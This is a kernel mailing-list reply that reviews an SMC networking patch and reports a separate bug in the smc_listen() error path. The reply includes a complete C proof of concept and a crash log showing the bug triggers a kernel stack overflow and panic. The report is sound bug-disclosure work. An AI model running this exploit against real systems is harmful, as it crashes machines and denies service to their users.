Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: XIAO WU
Date: Tue Jun 23 2026 - 06:39:16 EST
Hi Runyu,
Thanks for this patch.
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
> {
> struct smc_sock *lsmc;
>
> + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> + return;
> +
> read_lock_bh(&listen_clcsock->sk_callback_lock);
> lsmc = smc_clcsock_user_data(listen_clcsock);
The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.
Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:
https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@xxxxxxxxxx
The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):
smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;
smc->af_ops = *smc->ori_af_ops;
smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;
inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;
if (smc->limit_smc_hs)
tcp_sk(smc->clcsock->sk)->smc_hs_congested = smc_hs_congested;
rc = kernel_listen(smc->clcsock, backlog);
if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
&smc->clcsk_data_ready);
rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
goto out;
}
The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock). I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.
=== Reproduction ===
Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2
Trigger sequence:
1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
→ clcsock gets SO_REUSEADDR via smc_bind() copy
2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
→ Neither socket is in TCP_LISTEN at bind time, so SO_REUSEADDR lets both binds succeed
→ C enters TCP_LISTEN after its listen()
3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
→ icsk_af_ops NOT restored → clcsock points to wrapper
4. Close TCP C (free port), listen(A) again → succeeds
→ the second smc_listen() saves icsk_af_ops (still &smc->af_ops) as ori_af_ops, so ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock
5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
→ infinite recursion → IRQ stack guard page hit → kernel panic
=== Full PoC ===
Compile with: gcc -o poc poc.c -static
// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif
/*
 * Drive the socket sequence that reproduces the smc_listen() error-path
 * problem: a failed listen() on an SMC socket followed by a successful one,
 * then a plain TCP connect() to the listening port.
 *
 * Every setup call is checked so that a failure in the environment (no SMC
 * support, setsockopt/bind/fork errors) is reported instead of being
 * mistaken for "bug not reproduced".
 *
 * Returns 0 when the whole sequence ran (check dmesg for the crash) and
 * 1 when any setup step failed or step 3 unexpectedly succeeded.
 */
int main(void)
{
	int smc_a, tcp_c, client;
	struct sockaddr_in addr;
	pid_t child;
	int status, ret;
	socklen_t len;
	int val;
	int port;

	printf("=== SMC listen error path -> stack overflow PoC ===\n\n");

	/* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
	printf("[1] Create SMC socket A with SO_REUSEADDR\n");
	smc_a = socket(PF_SMC, SOCK_STREAM, 0);
	if (smc_a < 0) {
		perror("smc socket");
		return 1;
	}
	val = 1;
	/* Without SO_REUSEADDR the later bind of TCP C would fail, so check it. */
	if (setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)) < 0) {
		perror("setsockopt smc_a");
		close(smc_a);
		return 1;
	}
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = htonl(INADDR_ANY);
	addr.sin_port = htons(0);	/* let the kernel pick a free port */
	if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("bind smc_a");
		close(smc_a);
		return 1;
	}
	/* Read back the port the kernel assigned so TCP C can bind to it too. */
	len = sizeof(addr);
	if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
		perror("getsockname");
		close(smc_a);
		return 1;
	}
	port = ntohs(addr.sin_port);
	printf(" SMC A bound to port %d\n", port);

	/* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
	printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
	tcp_c = socket(AF_INET, SOCK_STREAM, 0);
	if (tcp_c < 0) {
		perror("tcp socket");
		close(smc_a);
		return 1;
	}
	val = 1;
	if (setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)) < 0) {
		perror("setsockopt tcp_c");
		close(tcp_c);
		close(smc_a);
		return 1;
	}
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = htonl(INADDR_ANY);
	addr.sin_port = htons(port);
	if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		perror("bind tcp_c");
		close(tcp_c);
		close(smc_a);
		return 1;
	}
	if (listen(tcp_c, 5) < 0) {
		perror("listen tcp_c");
		close(tcp_c);
		close(smc_a);
		return 1;
	}
	printf(" TCP C listening on port %d\n", port);

	/* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
	printf("[3] listen(SMC A) — expect failure... ");
	fflush(stdout);
	ret = listen(smc_a, 5);
	if (ret == 0) {
		printf("succeeded! Unexpected.\n");
		close(tcp_c);
		close(smc_a);
		return 1;
	}
	printf("failed: %s\n", strerror(errno));

	/* Step 4: Close TCP C to free the port */
	printf("[4] Close TCP C to free port %d\n", port);
	close(tcp_c);
	sleep(1);

	/* Step 5: listen(A) again → succeeds but ori_af_ops is self-referential */
	printf("[5] listen(SMC A) again... ");
	fflush(stdout);
	ret = listen(smc_a, 5);
	if (ret < 0) {
		/* Give the port a little longer to be released, then retry once. */
		printf("failed: %s, retrying...\n", strerror(errno));
		sleep(2);
		ret = listen(smc_a, 5);
	}
	if (ret < 0) {
		perror("retry");
		close(smc_a);
		return 1;
	}
	printf("succeeded! ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock\n");

	/* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK OVERFLOW */
	printf("[6] TCP connect → triggers infinite recursion...\n");
	fflush(stdout);	/* flush before fork so the child does not replay buffered output */
	child = fork();
	if (child < 0) {
		perror("fork");
		close(smc_a);
		return 1;
	}
	if (child == 0) {
		/* Child: plain TCP client connecting to the SMC listener over loopback. */
		client = socket(AF_INET, SOCK_STREAM, 0);
		if (client < 0)
			exit(1);
		memset(&addr, 0, sizeof(addr));
		addr.sin_family = AF_INET;
		addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
		addr.sin_port = htons(port);
		if (connect(client, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
			perror("connect");
			exit(1);
		}
		sleep(3);
		close(client);
		exit(0);
	}

	printf("Waiting for crash...\n");
	sleep(5);
	/* waitpid() returns 0 with WNOHANG while the child has not exited yet. */
	if (waitpid(child, &status, WNOHANG) == 0) {
		printf("Child still alive — check dmesg\n");
		kill(child, SIGKILL);
		waitpid(child, NULL, 0);
	}
	close(smc_a);
	return 0;
}
=== Crash Log ===
Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)
[ 1453.562682][ C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][ C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][ C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][ C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][ C0] Call Trace:
[ 1453.562970][ C0] <IRQ>
[ 1453.562980][ C0] lock_acquire+0x1ae/0x360
[ 1453.562995][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][ C0] smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][ C0] ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[... 15+ recursive frames ...]
[ 1453.564373][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][ C0] RIP: 0033:0x423574
[ 1453.577319][ C0] Kernel panic - not syncing: Fatal exception in interrupt
The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.
Thanks,
Xiao